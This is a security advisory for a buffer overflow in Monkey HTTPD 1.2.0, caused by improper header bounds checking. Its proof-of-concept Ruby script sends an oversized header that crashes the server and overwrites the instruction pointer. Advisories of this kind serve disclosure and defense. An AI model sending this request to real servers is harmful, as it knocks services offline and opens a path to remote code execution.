Title
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
Introduction
Monkey is a lightweight and powerful web server for
GNU/Linux.
It has been designed to be very scalable with low memory
and CPU consumption, the perfect solution for embedded
devices. Made for ARM, x86 and x64.
Abstract
A specially crafted request sent to the Monkey HTTPD
server triggers a buffer overflow which can be used to
control the flow of execution.
Report Timeline
2013-05-29
Discovered vulnerability via fuzzing
2013-05-30
Vendor Notification
Status
Published
Affected Products
Monkey HTTPD <= 1.2.0
Exploitation Technique
Remote
Details
Improper bounds checking while parsing headers allows
for an attacker to craft a request that will trigger a
buffer overflow during a call to memcpy() on line 268
in the file, mk_request.c.
Proof of Concept
The vulnerability can be exploited by remote attacker
without any special privileges. Under Ubuntu 13.04,
an offset of 2511 lines up the instruction pointer
with, 0x42424242.
#!/usr/bin/env ruby
require "socket"
host = "localhost"
port = 2001
s = TCPSocket.open(host, port)
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511
buf << "B" * 4
s.puts(buf)
Solution
There is currently no solution.
Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.
http://bugs.monkey-project.com/ticket/182
Doug Prostko <dougtko[at]gmail[dot]com>
Vulnerability discovery